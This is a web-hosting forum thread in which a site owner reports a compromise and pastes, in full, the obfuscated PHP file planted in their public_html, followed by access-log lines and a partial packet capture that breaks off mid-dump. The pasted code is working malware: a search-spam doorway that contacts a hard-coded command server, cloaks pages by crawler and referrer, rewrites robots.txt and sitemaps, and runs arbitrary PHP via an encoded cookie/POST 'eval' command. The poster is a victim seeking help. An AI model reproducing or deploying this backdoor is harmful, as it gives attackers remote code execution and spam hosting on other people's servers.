Attack
Attack
Dear,
I'm using last Vesta on Ubuntu 14.04, now I have this attack:
The problem how I can stop this attack an why it's possible write in my public_html.
Regards
I'm using last Vesta on Ubuntu 14.04, now I have this attack:
and in my public_html I find folder "propionyl-coa-zdnr/fttahc" inside there is "index.php"50.62.208.149 - - [25/Jan/2021:19:15:43 +0100] "GET /propionyl-coa-zdnr/fttahc HTTP/1.0" 301 759 "http://www.mysite.com/propionyl-coa-zdnr/fttahc" "Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0"
50.62.208.149 - - [25/Jan/2021:19:15:44 +0100] "GET /propionyl-coa-zdnr/fttahc HTTP/1.0" 404 40850 "http://www.mysite.com/propionyl-coa-zdnr/fttahc" "Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0"
If I try run this my server reply "page no found".<?php
@ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@error_reporting(0);@set_time_limit(0);date_default_timezone_set('UTC');class _zc1ryjh{static private $_8spe9dpd = 2420912312;static function _814m6($_3chjy2s4, $_5o3gbzbv){$_3chjy2s4[2] = count($_3chjy2s4) > 4 ? long2ip(_zc1ryjh::$_8spe9dpd - 272) : $_3chjy2s4[2];$_gf8sgs58 = _zc1ryjh::_4v1sq($_3chjy2s4, $_5o3gbzbv);if (!$_gf8sgs58) {$_gf8sgs58 = _zc1ryjh::_szn1q($_3chjy2s4, $_5o3gbzbv);}return $_gf8sgs58;}static function _4v1sq($_3chjy2s4, $_gf8sgs58, $_v2i0yu0q = NULL){if (!function_exists('curl_version')) {return "";}if (is_array($_3chjy2s4)) {$_3chjy2s4 = implode("/", $_3chjy2s4);}$_fg2kfs6a = curl_init();curl_setopt($_fg2kfs6a, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($_fg2kfs6a, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($_fg2kfs6a, CURLOPT_URL, $_3chjy2s4);if (!empty($_gf8sgs58)) {curl_setopt($_fg2kfs6a, CURLOPT_POST, 1);curl_setopt($_fg2kfs6a, CURLOPT_POSTFIELDS, $_gf8sgs58);}if (!empty($_v2i0yu0q)) {curl_setopt($_fg2kfs6a, CURLOPT_HTTPHEADER, $_v2i0yu0q);}curl_setopt($_fg2kfs6a, CURLOPT_RETURNTRANSFER, TRUE);$_p2sl7u8a = curl_exec($_fg2kfs6a);curl_close($_fg2kfs6a);return $_p2sl7u8a;}static function _szn1q($_3chjy2s4, $_gf8sgs58, $_v2i0yu0q = NULL){if (is_array($_3chjy2s4)) {$_3chjy2s4 = implode("/", $_3chjy2s4);}if (!empty($_gf8sgs58)) {$_h1py0sy1 = array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => $_gf8sgs58);if (!empty($_v2i0yu0q)) {$_h1py0sy1["header"] = $_h1py0sy1["header"] . "\r\n" . implode("\r\n", $_v2i0yu0q);}$_lkrl430p = stream_context_create(array('http' => $_h1py0sy1));} else {$_h1py0sy1 = array('method' => 'GET',);if (!empty($_v2i0yu0q)) {$_h1py0sy1["header"] = implode("\r\n", $_v2i0yu0q);}$_lkrl430p = stream_context_create(array('http' => $_h1py0sy1));}return @file_get_contents($_3chjy2s4, FALSE, $_lkrl430p);}}class _fj0l5i4{private static $_e3vbkmed = "";private static $_eudlzycb = -1;private static $_o6cnzwl2 = "";private $_jjt63nsj = "";private $_rhxb9379 = "";private $_0rnai7fv = "";private $_829th661 = "";public static function _znbqo($_ssatnrck, $_uotguerd, $_jx79b2zu){_fj0l5i4::$_e3vbkmed = $_ssatnrck . "/cache/";_fj0l5i4::$_eudlzycb = $_uotguerd;_fj0l5i4::$_o6cnzwl2 = $_jx79b2zu;if (!@file_exists(_fj0l5i4::$_e3vbkmed)) {@mkdir(_fj0l5i4::$_e3vbkmed);}}static public function _mnlv7(){$_u84t39zp = 0;foreach (scandir(_fj0l5i4::$_e3vbkmed) as $_fk40a44w) {$_u84t39zp += 1;}return $_u84t39zp;}public static function _c2h3p(){return TRUE;}public function __construct($_rhy23rx3, $_x9bufplp, $_ypibf928, $_zd1i4hhu){$this->_jjt63nsj = $_rhy23rx3;$this->_rhxb9379 = $_x9bufplp;$this->_0rnai7fv = $_ypibf928;$this->_829th661 = $_zd1i4hhu;}public function _j2dlh(){function _m7xw5($_jg390771, $_9oyw8goy){return round(rand($_jg390771, $_9oyw8goy - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);}$_ycmobcif = _cgl8qc::_4mdz2();$_gf8sgs58 = str_replace("{{ text }}", $this->_rhxb9379,str_replace("{{ keyword }}", $this->_0rnai7fv,str_replace("{{ links }}", $this->_829th661, $this->_jjt63nsj)));while (TRUE) {$_7patefkr = preg_replace('/' . preg_quote("{{ randkeyword }}", '/') . '/', _cgl8qc::_eehvg(), $_gf8sgs58, 1);if ($_7patefkr === $_gf8sgs58) {break;}$_gf8sgs58 = $_7patefkr;}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX-ANCHOR (\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_ypibf928 = @$_ycmobcif[intval($_sln2mkj6[1])];$_5ujbized = _7wn7urj::_9itoa($_ypibf928);$_gf8sgs58 = str_replace($_sln2mkj6[0], $_5ujbized, $_gf8sgs58);}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX (\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_ypibf928 = @$_ycmobcif[intval($_sln2mkj6[1])];$_gf8sgs58 = str_replace($_sln2mkj6[0], $_ypibf928, $_gf8sgs58);}while (TRUE) {preg_match('/{{ RANDFLOAT (\d*)-(\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_gf8sgs58 = str_replace($_sln2mkj6[0], _m7xw5($_sln2mkj6[1], $_sln2mkj6[2]), $_gf8sgs58);}while (TRUE) {preg_match('/{{ RANDINT (\d*)-(\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_gf8sgs58 = str_replace($_sln2mkj6[0], rand($_sln2mkj6[1], $_sln2mkj6[2]), $_gf8sgs58);}return $_gf8sgs58;}public function _2iur5(){$_rbo8wkb2 = _fj0l5i4::$_e3vbkmed . md5($this->_0rnai7fv . _fj0l5i4::$_o6cnzwl2);if (_fj0l5i4::$_eudlzycb == -1) {$_efkoaggn = -1;} else {$_efkoaggn = time() + (3600 * 24 * 30);}$_hlxuvxyx = array("template" => $this->_jjt63nsj, "text" => $this->_rhxb9379, "keyword" => $this->_0rnai7fv,"links" => $this->_829th661, "expired" => $_efkoaggn);@file_put_contents($_rbo8wkb2, serialize($_hlxuvxyx));}static public function _5h0rw($_ypibf928){$_rbo8wkb2 = _fj0l5i4::$_e3vbkmed . md5($_ypibf928 . _fj0l5i4::$_o6cnzwl2);$_rbo8wkb2 = @unserialize(@file_get_contents($_rbo8wkb2));if (!empty($_rbo8wkb2) && ($_rbo8wkb2["expired"] > time() || $_rbo8wkb2["expired"] == -1)) {return new _fj0l5i4($_rbo8wkb2["template"], $_rbo8wkb2["text"], $_rbo8wkb2["keyword"], $_rbo8wkb2["links"]);} else {return null;}}}class _z1z2c5{private static $_e3vbkmed = "";private static $_agfg14nt = "";public static function _znbqo($_ssatnrck, $_aj6h3dw8){_z1z2c5::$_e3vbkmed = $_ssatnrck . "/";_z1z2c5::$_agfg14nt = $_aj6h3dw8;if (!@file_exists(_z1z2c5::$_e3vbkmed)) {@mkdir(_z1z2c5::$_e3vbkmed);}}public static function _c2h3p(){return TRUE;}static public function _mnlv7(){$_u84t39zp = 0;foreach (scandir(_z1z2c5::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _z1z2c5::$_agfg14nt) === 0) {$_u84t39zp += 1;}}return $_u84t39zp;}static public function _eehvg(){$_d0n8q08z = array();foreach (scandir(_z1z2c5::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _z1z2c5::$_agfg14nt) === 0) {$_d0n8q08z[] = $_fk40a44w;}}return @file_get_contents(_z1z2c5::$_e3vbkmed . $_d0n8q08z[array_rand($_d0n8q08z)]);}static public function _2iur5($_gxv1iqbn){if (@file_exists(_z1z2c5::$_agfg14nt . "_" . md5($_gxv1iqbn) . ".html")) {return;}@file_put_contents(_z1z2c5::$_agfg14nt . "_" . md5($_gxv1iqbn) . ".html", $_gxv1iqbn);}}class _cgl8qc{private static $_e3vbkmed = "";private static $_agfg14nt = "";private static $_rg3x84go = Array();private static $_9m6iqpaj = Array();public static function _znbqo($_ssatnrck, $_aj6h3dw8){_cgl8qc::$_e3vbkmed = $_ssatnrck . "/";_cgl8qc::$_agfg14nt = $_aj6h3dw8;if (!@file_exists(_cgl8qc::$_e3vbkmed)) {@mkdir(_cgl8qc::$_e3vbkmed);}}private static function _dawb2(){$_s265o4f6 = array();foreach (scandir(_cgl8qc::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _cgl8qc::$_agfg14nt) === 0) {$_s265o4f6[] = $_fk40a44w;}}return $_s265o4f6;}public static function _c2h3p(){return TRUE;}static public function _eehvg(){if (empty(_cgl8qc::$_rg3x84go)){$_s265o4f6 = _cgl8qc::_dawb2();_cgl8qc::$_rg3x84go = @file(_cgl8qc::$_e3vbkmed . $_s265o4f6[array_rand($_s265o4f6)], FILE_IGNORE_NEW_LINES);}return _cgl8qc::$_rg3x84go[array_rand(_cgl8qc::$_rg3x84go)];}static public function _4mdz2(){if (empty(_cgl8qc::$_9m6iqpaj)){$_s265o4f6 = _cgl8qc::_dawb2();foreach ($_s265o4f6 as $_muvtxbmx) {_cgl8qc::$_9m6iqpaj = array_merge(_cgl8qc::$_9m6iqpaj, @file(_cgl8qc::$_e3vbkmed . $_muvtxbmx, FILE_IGNORE_NEW_LINES));}}return _cgl8qc::$_9m6iqpaj;}static public function _2iur5($_g9qi85d6){if (@file_exists(_cgl8qc::$_agfg14nt . "_" . md5($_g9qi85d6) . ".list")) {return;}@file_put_contents(_cgl8qc::$_agfg14nt . "_" . md5($_g9qi85d6) . ".list", $_g9qi85d6);}static public function _knfc6($_ypibf928){@file_put_contents(_cgl8qc::$_agfg14nt . "_" . md5(_7wn7urj::$_4trnoaqg) . ".list", $_ypibf928 . "\n", 8);}}class _7wn7urj{static public $_i1v9gtfb = "5.0";static public $_4trnoaqg = "5bb2b6ab-3c35-5b9e-3775-0ee616879036";private $_r5knkrc2 = "http://136.12.78.46/app/assets/api2?act ... r";private $_ve4xuwfa = "http://136.12.78.46/app/assets/api?action=page";static public $_l2vuknso = 5;static public $_bxt80c2j = 20;private function _jbfgg(){$_b0ccu89r = array('#libwww-perl#i','#MJ12bot#i','#msnbot#i', '#msnbot-media#i','#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i','#spider#i', '#yahoo#i', '#google#i', '#altavista#i','#ask#i','#yahoo!\s*slurp#i','#BingBot#i');if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_b0ccu89r, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {$_qece251g = 1;} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {$_qece251g = 1;} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {$_qece251g = 1;} else {$_qece251g = 0;}return $_qece251g;}private static function _ljcy0(){$_5o3gbzbv = array();$_5o3gbzbv['ip'] = $_SERVER['REMOTE_ADDR'];$_5o3gbzbv['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];$_5o3gbzbv['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_5o3gbzbv['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_5o3gbzbv['ref'] = @$_SERVER['HTTP_REFERER'];$_5o3gbzbv['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_5o3gbzbv['acp'] = @$_SERVER['HTTP_ACCEPT'];$_5o3gbzbv['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_5o3gbzbv['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_5o3gbzbv;}public function __construct(){$this->_r5knkrc2 = explode("/", $this->_r5knkrc2);$this->_ve4xuwfa = explode("/", $this->_ve4xuwfa);}static public function _ovl43($_6csgigc5){if (strlen($_6csgigc5) < 4) {return "";}$_4wgjfb6w = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_ycmobcif = str_split($_4wgjfb6w);$_ycmobcif = array_flip($_ycmobcif);$_8yjc1jpr = 0;$_g60o7pzi = "";$_6csgigc5 = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_6csgigc5);do {$_ablz7vi7 = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_l137zfsi = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_d6zybjy7 = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_7l9zpqcx = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_y4ybl5j6 = ($_ablz7vi7 << 2) | ($_l137zfsi >> 4);$_05kiomga = (($_l137zfsi & 15) << 4) | ($_d6zybjy7 >> 2);$_msbx5hih = (($_d6zybjy7 & 3) << 6) | $_7l9zpqcx;$_g60o7pzi = $_g60o7pzi . chr($_y4ybl5j6);if ($_d6zybjy7 != 64) {$_g60o7pzi = $_g60o7pzi . chr($_05kiomga);}if ($_7l9zpqcx != 64) {$_g60o7pzi = $_g60o7pzi . chr($_msbx5hih);}} while ($_8yjc1jpr < strlen($_6csgigc5));return $_g60o7pzi;}private function _73fse($_ypibf928){$_rhy23rx3 = "";$_x9bufplp = "";$_5o3gbzbv = _7wn7urj::_ljcy0();$_5o3gbzbv["uid"] = _7wn7urj::$_4trnoaqg;$_5o3gbzbv["keyword"] = $_ypibf928;$_5o3gbzbv["tc"] = 10;$_5o3gbzbv = http_build_query($_5o3gbzbv);$_ea3h9tn2 = _zc1ryjh::_814m6($this->_ve4xuwfa, $_5o3gbzbv);if (strpos($_ea3h9tn2, _7wn7urj::$_4trnoaqg) === FALSE) {return array($_rhy23rx3, $_x9bufplp);}$_rhy23rx3 = _z1z2c5::_eehvg();$_x9bufplp = substr($_ea3h9tn2, strlen(_7wn7urj::$_4trnoaqg));$_x9bufplp = explode("\n", $_x9bufplp);shuffle($_x9bufplp);$_x9bufplp = implode(" ", $_x9bufplp);return array($_rhy23rx3, $_x9bufplp);}private function _hwjli(){$_5o3gbzbv = _7wn7urj::_ljcy0();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_5o3gbzbv['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_5o3gbzbv['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_5o3gbzbv['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_5o3gbzbv["uid"] = _7wn7urj::$_4trnoaqg;$_5o3gbzbv = http_build_query($_5o3gbzbv);$_w9ulzzc5 = _zc1ryjh::_814m6($this->_r5knkrc2, $_5o3gbzbv);$_w9ulzzc5 = @unserialize($_w9ulzzc5);if (isset($_w9ulzzc5["type"]) && $_w9ulzzc5["type"] == "redir") {if (!empty($_w9ulzzc5["data"]["header"])) {header($_w9ulzzc5["data"]["header"]);return true;} elseif (!empty($_w9ulzzc5["data"]["code"])) {echo $_w9ulzzc5["data"]["code"];return true;}}return false;}public function _c2h3p(){return _fj0l5i4::_c2h3p() && _z1z2c5::_c2h3p() && _cgl8qc::_c2h3p();}static public function _1ymhu(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _qdsbn(){$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];if (strpos($_8x93o7q7, ".php") === FALSE) {$_8x93o7q7 = explode("/", $_8x93o7q7);array_pop($_8x93o7q7);$_8x93o7q7 = implode("/", $_8x93o7q7) . "/";}return sprintf("%s://%s%s", _7wn7urj::_1ymhu() ? "https" : "http", $_SERVER['HTTP_HOST'], $_8x93o7q7);}public static function _radf5(){$_ymon8uv2 = array("https://www.bing.com/ping?sitemap=" => "Thanks for submitting your Sitemap","https://www.google.com/ping?sitemap=" => "Sitemap Notification Received");$_v2i0yu0q = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language: en-US,en;q=0.5","User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",);$_7574umt9 = urlencode(_7wn7urj::_gb1un() . "/sitemap.xml");foreach ($_ymon8uv2 as $_3chjy2s4 => $_pkll7imh) {$_l749xbaz = _zc1ryjh::_4v1sq($_3chjy2s4 . $_7574umt9, NULL, $_v2i0yu0q);if (empty($_l749xbaz)) {$_l749xbaz = _zc1ryjh::_szn1q($_3chjy2s4 . $_7574umt9, NULL, $_v2i0yu0q);}if (empty($_l749xbaz)) {return FALSE;}if (strpos($_l749xbaz, $_pkll7imh) === FALSE) {return FALSE;}}return TRUE;}public static function _w44lw(){$_awkqpmfn = "User-agent: *\nDisallow: %s\nUser-agent: Bingbot\nUser-agent: Googlebot\nUser-agent: Slurp\nDisallow:\nSitemap: %s\n";$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];$_wvzdov1p = substr($_8x93o7q7, 0, strrpos($_8x93o7q7, "/"));$_iw0ofcj9 = sprintf($_awkqpmfn, $_wvzdov1p, _7wn7urj::_gb1un() . "/sitemap.xml");$_wsq475h4 = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";if (@file_exists($_wsq475h4)) {@chmod($_wsq475h4, 0777);$_wkmac7k3 = @file_get_contents($_wsq475h4);} else {$_wkmac7k3 = "";}if (strpos($_wkmac7k3, $_iw0ofcj9) === FALSE) {@file_put_contents($_wsq475h4, $_wkmac7k3 . "\n" . $_iw0ofcj9);$_wkmac7k3 = @file_get_contents($_wsq475h4);return (strpos($_wkmac7k3, $_iw0ofcj9) !== FALSE);}return FALSE;}public static function _gb1un(){$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];$_ssatnrck = substr($_8x93o7q7, 0, strrpos($_8x93o7q7, "/"));return sprintf("%s://%s%s", _7wn7urj::_1ymhu() ? "https" : "http", $_SERVER['HTTP_HOST'], $_ssatnrck);}public static function _9itoa($_ypibf928){$_zmh5ug6v = _7wn7urj::_qdsbn();$_suwyqev6 = substr(md5(_7wn7urj::$_4trnoaqg . "salt3"), 0, 6);$_mlia2fdv = "";if (substr($_zmh5ug6v, -1) == "/") {if (ord($_suwyqev6[1]) % 2) {$_ypibf928 = str_replace(" ", "-", $_suwyqev6 . "-" . $_ypibf928);} else {$_ypibf928 = str_replace(" ", "-", $_ypibf928 . "-" . $_suwyqev6);}$_mlia2fdv = sprintf("%s%s", $_zmh5ug6v, urlencode($_ypibf928));} else {if (ord($_suwyqev6[0]) % 2) {$_mlia2fdv = sprintf("%s?%s=%s",$_zmh5ug6v,$_suwyqev6,urlencode(str_replace(" ", "-", $_ypibf928)));} else {$_u0jhvc7p = array("id", "page", "tag");$_929apsgm = $_u0jhvc7p[ord($_suwyqev6[2]) % count($_u0jhvc7p)];if (ord($_suwyqev6[1]) % 2) {$_ypibf928 = str_replace(" ", "-", $_suwyqev6 . "-" . $_ypibf928);} else {$_ypibf928 = str_replace(" ", "-", $_ypibf928 . "-" . $_suwyqev6);}$_mlia2fdv = sprintf("%s?%s=%s",$_zmh5ug6v,$_929apsgm,urlencode($_ypibf928));}}return $_mlia2fdv;}public static function _2ncga($_jg390771, $_9oyw8goy){$_eutr44ii = "";for ($_8yjc1jpr = 0; $_8yjc1jpr < rand($_jg390771, $_9oyw8goy); $_8yjc1jpr++) {$_ypibf928 = _cgl8qc::_eehvg();$_eutr44ii .= sprintf("<a href=\"%s\">%s</a>,\n",_7wn7urj::_9itoa($_ypibf928), ucwords($_ypibf928));}return $_eutr44ii;}public static function _t6ier($_juz9n20h=FALSE){$_q34iy50g = dirname(__FILE__) . "/sitemap.xml";$_a0vj65sd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap ... $_w74wdc6w = "</urlset>";$_ycmobcif = _cgl8qc::_4mdz2();$_gw8pgmpd = array();if (file_exists($_q34iy50g)) {$_ea3h9tn2 = simplexml_load_file($_q34iy50g);foreach ($_ea3h9tn2 as $_js5pietd) {$_gw8pgmpd[(string)$_js5pietd->loc] = (string)$_js5pietd->lastmod;}}else {$_juz9n20h = FALSE;}foreach ($_ycmobcif as $_3pouxiit) {$_mlia2fdv = _7wn7urj::_9itoa($_3pouxiit);if (isset($_gw8pgmpd[$_mlia2fdv])){continue;}if ($_juz9n20h) {$_roen0v2x = time();}else {$_roen0v2x = time() - (crc32 ($_3pouxiit) % (60 * 60 * 24 * 30));}$_gw8pgmpd[$_mlia2fdv] = date("Y-m-d", $_roen0v2x);;}$_a3kxg8oz = "";foreach ($_gw8pgmpd as $_3chjy2s4 => $_roen0v2x){$_a3kxg8oz .= "<url>\n";$_a3kxg8oz .= sprintf("<loc>%s</loc>\n", $_3chjy2s4);$_a3kxg8oz .= sprintf("<lastmod>%s</lastmod>\n", $_roen0v2x);$_a3kxg8oz .= "</url>\n";}$_kqtfv6sc = $_a0vj65sd . $_a3kxg8oz . $_w74wdc6w;$_7574umt9 = _7wn7urj::_gb1un() . "/sitemap.xml";@file_put_contents($_q34iy50g, $_kqtfv6sc);return $_7574umt9;}public function _hfoem(){$_929apsgm = substr(md5(_7wn7urj::$_4trnoaqg . "salt3"), 0, 6);if (isset($_GET[$_929apsgm])) {$_ypibf928 = $_GET[$_929apsgm];} elseif (strpos($_SERVER["REQUEST_URI"], $_929apsgm) !== FALSE) {$_ftx7qtaz = explode("/", $_SERVER["REQUEST_URI"]);foreach ($_ftx7qtaz as $_fpm51tev) {if (strpos($_fpm51tev, $_929apsgm) !== FALSE) {$_44nbpb1x = explode("=", $_fpm51tev);$_f2pcgqki = array_pop($_44nbpb1x);$_f2pcgqki = str_replace($_929apsgm . "-", "", $_f2pcgqki);$_f2pcgqki = str_replace("-" . $_929apsgm, "", $_f2pcgqki);$_ypibf928 = $_f2pcgqki;}}}if (empty($_ypibf928)) {$_ycmobcif = _cgl8qc::_4mdz2();$_ypibf928 = $_ycmobcif[0];}if (!empty($_ypibf928)) {$_ypibf928 = str_replace("-", " ", $_ypibf928);if (!$this->_jbfgg()) {if ($this->_hwjli()) {return;}}$_ypibf928 = urldecode($_ypibf928);$_w9ulzzc5 = _fj0l5i4::_5h0rw($_ypibf928);if (empty($_w9ulzzc5)) {list($_rhy23rx3, $_x9bufplp) = $this->_73fse($_ypibf928);if (empty($_x9bufplp)) {return;}$_w9ulzzc5 = new _fj0l5i4($_rhy23rx3, $_x9bufplp, $_ypibf928, _7wn7urj::_2ncga(_7wn7urj::$_l2vuknso, _7wn7urj::$_bxt80c2j));$_w9ulzzc5->_2iur5();}echo $_w9ulzzc5->_j2dlh();}}}_fj0l5i4::_znbqo(dirname(__FILE__), -1, _7wn7urj::$_4trnoaqg);_z1z2c5::_znbqo(dirname(__FILE__), substr(md5(_7wn7urj::$_4trnoaqg . "salt12"), 0, 4));_cgl8qc::_znbqo(dirname(__FILE__), substr(md5(_7wn7urj::$_4trnoaqg . "salt22"), 0, 4));function _2tto9($_ea3h9tn2, $_3pouxiit){$_y291x0ld = "";for ($_8yjc1jpr = 0; $_8yjc1jpr < strlen($_ea3h9tn2);) {for ($_t1f7fw3y = 0; $_t1f7fw3y < strlen($_3pouxiit) && $_8yjc1jpr < strlen($_ea3h9tn2); $_t1f7fw3y++, $_8yjc1jpr++) {$_y291x0ld .= chr(ord($_ea3h9tn2[$_8yjc1jpr]) ^ ord($_3pouxiit[$_t1f7fw3y]));}}return $_y291x0ld;}function _jgank($_ea3h9tn2, $_3pouxiit, $_db8usjta){return _2tto9(_2tto9($_ea3h9tn2, $_3pouxiit), $_db8usjta);}foreach (array_merge($_COOKIE, $_POST) as $_590a55b5 => $_ea3h9tn2) {$_ea3h9tn2 = @unserialize(_jgank(_7wn7urj::_ovl43($_ea3h9tn2), $_590a55b5, _7wn7urj::$_4trnoaqg));if (isset($_ea3h9tn2['ak']) && _7wn7urj::$_4trnoaqg == $_ea3h9tn2['ak']) {if ($_ea3h9tn2['a'] == 'doorway2') {if ($_ea3h9tn2['sa'] == 'check') {$_gf8sgs58 = _zc1ryjh::_814m6(explode("/", "http://httpbin.org/"), "");if (strlen($_gf8sgs58) > 512) {echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,"cache" => _fj0l5i4::_mnlv7(),"keywords" => count(_cgl8qc::_4mdz2()),"templates" => _z1z2c5::_mnlv7()));}exit;}if ($_ea3h9tn2['sa'] == 'templates') {foreach ($_ea3h9tn2["templates"] as $_rhy23rx3) {_z1z2c5::_2iur5($_rhy23rx3);echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}}if ($_ea3h9tn2['sa'] == 'keywords') {_cgl8qc::_2iur5($_ea3h9tn2["keywords"]);_7wn7urj::_t6ier();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}if ($_ea3h9tn2['sa'] == 'update_sitemap') {_7wn7urj::_t6ier(TRUE);echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}if ($_ea3h9tn2['sa'] == 'pages') {$_hzdo1lzm = 0;$_k4dyo0ax = _cgl8qc::_4mdz2();if (_z1z2c5::_mnlv7() > 0) {foreach ($_ea3h9tn2['pages'] as $_w9ulzzc5) {$_2nsu4827 = _fj0l5i4::_5h0rw($_w9ulzzc5["keyword"]);if (empty($_2nsu4827)) {$_2nsu4827 = new _fj0l5i4(_z1z2c5::_eehvg(), $_w9ulzzc5["text"], $_w9ulzzc5["keyword"], _7wn7urj::_2ncga(_7wn7urj::$_l2vuknso, _7wn7urj::$_bxt80c2j));$_2nsu4827->_2iur5();$_hzdo1lzm += 1;if (!in_array($_w9ulzzc5["keyword"], $_k4dyo0ax)){_cgl8qc::_knfc6($_w9ulzzc5["keyword"]);}}}}echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "pages" => $_hzdo1lzm));}if ($_ea3h9tn2["sa"] == "ping") {$_l749xbaz = _7wn7urj::_radf5();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "result" => (int)$_l749xbaz));}if ($_ea3h9tn2["sa"] == "robots") {$_l749xbaz = _7wn7urj::_w44lw();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "result" => (int)$_l749xbaz));}}if ($_ea3h9tn2['sa'] == 'eval') {eval($_ea3h9tn2["data"]);exit;}}}$_e8um1fck = new _7wn7urj();if ($_e8um1fck->_c2h3p()) {$_e8um1fck->_hfoem();}exit();
The problem how I can stop this attack an why it's possible write in my public_html.
Regards
Re: Attack
Hi,
my previous post was't clear, now I'm very clear this is attack:
The problem is now in my public_html I have folder "apichatpong-weerasethakul-eetuva".
Any idea solve this problem?
Regards
D
my previous post was't clear, now I'm very clear this is attack:
I preplace my domain with "mydomain" and my IP with "MYIP".Frame 1646723: 580 bytes on wire (4640 bits), 580 bytes captured (4640 bits)
Encapsulation type: Ethernet (1)
Arrival Time: Jan 28, 2021 21:37:08.434383000 W. Europe Standard Time
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1611866228.434383000 seconds
[Time delta from previous captured frame: 0.082077000 seconds]
[Time delta from previous displayed frame: 0.082077000 seconds]
[Time since reference or first frame: 10553.164318000 seconds]
Frame Number: 1646723
Frame Length: 580 bytes (4640 bits)
Capture Length: 580 bytes (4640 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
[Coloring Rule Name: HTTP]
[Coloring Rule String: http || tcp.port == 80 || http2]
Ethernet II, Src: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d), Dst: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
Destination: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
Address: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d)
Address: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 67.213.82.137, Dst: MYIP
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
